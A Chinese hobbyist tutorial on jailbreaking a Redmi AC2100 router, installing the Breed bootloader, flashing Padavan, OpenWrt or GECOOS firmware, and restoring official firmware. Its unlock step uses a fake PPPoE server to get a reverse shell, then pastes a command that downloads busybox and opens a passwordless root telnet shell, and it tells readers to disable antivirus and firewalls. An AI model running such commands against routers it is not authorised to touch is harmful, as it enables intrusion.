说明:
路由是红米AC2100
电脑是win10系统
一、刷入Breed
1. 准备
-
Windows系统中,按组合键Win+R,弹出运行框,输入Control回车后打开控制面板
-
程序 ---> 程序和功能 ---> 启用和关闭Windows功能
-
勾选telnet client(或telnet 客户端)
Snipaste_2020-06-29_23-07-04
-
从“控制面板\网络和 Internet\网络和共享中心\网络连接(更改适配器设置)”把你的所有不相关的网络接口都禁掉,包括虚拟机接口
-
修改连接路由器的网口地址为192.168.31.177,子网掩码255.255.255.0,默认网关192.168.31.1
Snipaste_2020-06-29_23-11-17
- 关闭所有杀毒软件,关闭防火墙(360,火戎等等)
Snipaste_2020-06-29_23-03-34
2. 开启Telnet
- 把你的路由器按照如下连接
image-20200611135029612
-
浏览器进入路由器管理页面(192.168.31.1或miwifi.com),确保路由地址为192.168.31.1,设置pppoe拨号。
账号:123
密码:123
Snipaste_2020-06-29_23-25-32
-
解压好刷机工具【RM2100完整版.zip】, 打开/rm2100文件夹,安装文件夹里的npcap-0.9991.exe
-
打开 "开启telnet命令.txt" , 并提前复制好 "开启telnet命令.txt" 里面的命令
Snipaste_2020-06-29_23-13-46
- 打开执行 "一键开启telnet.bat"(不用管理员运行),按照提示操作(按回车键)
Snipaste_2020-06-29_23-15-19
- 开启PPPOE服务器,跳出Task_PPPOE服务器窗口,看Task_PPPOE服务器窗口是否有数据包(下图红线内容)
200630_134857
- 再回到一键解锁工具窗口,根据提示输入
y回车,开启文件服务器
Snipaste_2020-06-29_23-15-37
-
直到Task_反弹shell窗口显示如下连接成功(
connect to [192.168.31.177] form (UNKNOWN) [192.168.31.1] ......)电脑和路由器连接成功了
200630_133853
-
把提前复制好 "开启telnet命令.txt" 里面的命令(不用提前也可以),粘贴到反弹sheel窗口(右键为粘贴),回车运行
cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh
200630_135429
- 窗口显示蓝线内容,路由器Telnet功能开启成功
注意1:卡反弹shell等问题大概率是电脑系统、防火墙、杀毒软件造成的,如果开telnet你这一步没有成功,就彻底关掉电脑防火墙和杀毒软件,再从头走一遍。
注意2:路由telnet开启成功后记得把WAN-LAN之间的网线(上面接线图棕色线)拔掉,否则刷入breed后易造成网络风暴。
3. 刷入Breed
- Win+R,输入cmd回车打开命令行窗口,输入下面命令并回车
telnet 192.168.31.1 #telnet连接到路由器
Snipaste_2020-06-29_23-19-58
- 依次输入以下三条命令
cd /tmp #进入/tmp路径,注意此时“Task_文件服务器”进程是否还在运行,没运行的再执行一下/rm2100中的httpserver.bat,之后再执行下面命令
wget http://192.168.31.177:8081/breed-mt7621-xiaomi-r3g.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit #上传Breed并设置环境参数
mtd -r write breed-mt7621-xiaomi-r3g.bin Bootloader #烧写Breed到Bootloader分区
200630_140138
-
出现上图篮框内容,表示Breed已经烧录好了,路由正在重启
-
将电脑网卡改为自动获取ip,等待路由器重启(当电脑获取到ip或者路由只有一个蓝灯亮时,breed引导官方固件成功)。
Snipaste_2020-06-29_23-24-27
4. 进入Breed
- 建议等待5分钟后拔电,用牙签按住reset键再插电,等蓝灯闪烁,松开reset键,浏览器访问192.168.1.1即可进入breedweb界面。
200630_141308
- 首次进入breed记得先备份下编程器固件和eeprom。
至此,路由器成功刷入breed。
二 、刷入第三方固件
在刷第三方固件之前,进入Breed控制台,固件备份,最好先一下备份编程器固件
1. 刷Padavan(老毛子)
-
进入Breed控制台,选择固件更新---固件---选择文件,选择老毛子padavan固件后,点上传
200630_155322
-
上传完成后,更新确认,确认没问题后点击更新
200630_153348
- 正在更新,等待更新完成
200630_153124
-
更新完成后,等待5分钟,然后浏览器输入padavan的管理IP地址(不同大佬编译的固件,管理IP地址可能不同),输入账号密码进入路由后台
-
账号:admin
-
密码:admin
-
200630_154012
- 刷机完成,进入熟悉的老毛子后台界面,很多插件
2. 刷OpenWrt(LEDE)
- 进breed的环境变量编缉菜单,新增字段xiaomi.r3g.bootfw值为2, 然后点保存。
img
- 刷入临时固件
img
img
- 重启后会进入这个临时的openwrt,我们打算用它来刷我们真正想刷的openwrt固件。这个临时openwrt的地址是 192.168.1.1,用户名是root,没有密码。
img
- 然后找到System -> Backup / Flash Firmware,点击 Flash image... 上传我们想刷的固件
img
img
- 不要勾选 Keep settings and retain the current configuration,最后点Continue
img
- 等几分钟让路由器自己重启。进入新固件
img
3. 刷GECOOS(集客)
- 进入Breed控制台,选择固件更新---固件---选择文件,选择集客AP固件后,点上传(从2020051200版本开始支持breed升级)
200630_155322
-
然后进入更新确认界面点更新,等在更新完成
-
更新完成后,等5分钟,在浏览器输入集客AP的管理后台IP(6.6.6.6或者在路由后台找到对应的IP)
154703zwwkhfkjvzjkzl18
- 进入熟悉的集客AP的后台,之后就是自己设置
三、刷回官方bootloader及固件
1. 刷回官方bootloader
- 首席那进入Breed,“固件更新”-“Bootloader”处选择官方bootloader文件上传
200630_161559
- 确认更新界面,点更新,官bootloader只有512KB大小,所以很快就更新完成并返回Breed界面
200630_161633
- 此时,已经刷回官bootloader了
2. 刷回官方固件
上面已经恢复官方boot引导,再用官方救砖工具一键刷回。
-
首先断开电源,用牙签按住重置键,再插上电源,持续大概10秒,直到出现橙色灯闪烁。
-
使用小米路由修复工具,刷回固件,打开其中的MIWIFIRepairTool.x86
200630_162523
- 点击浏览,选择下载文件中的官方固件->红米->miwifi_rm2100_firmware_d517e_1.0.14.bin,点击下一步
200630_162706
- 选择连接路由器LAN口的网卡,再点击下一步
200630_162954
- 然后就自动开始刷机了
200630_163240
- 进度条跑满,看到如下提示时,并且路由器出现蓝色灯闪烁,即可重启路由器完成刷机
200630_163502
- 路由重启完成后,登陆路由器后台手机APP(或浏览器192.168.31.1),顺利进入路由器后台
200630_164503
参考:
https://www.right.com.cn/forum/forum.php?mod=viewthread&tid=4023907&extra=page%3D1&page=1
Padavan来自恩山淮尚的帖子
OpenWrt来自恩山pnq的帖子
GECOOS来自恩山sgwyj的帖子
https://www.right.com.cn/forum/thread-4021056-1-1.html
小米路由官方救砖工具使用说明
https://www.xiaomi.cn/post/5289432 。 小米路由官方资源下载首页
http://miwifi.com/miwifi_download.html 。
红米AC2100刷回官方固件
https://www.smyz.net/pc/7793.html
以及还有恩山其他帖子,具体就不一一列出了
网友评论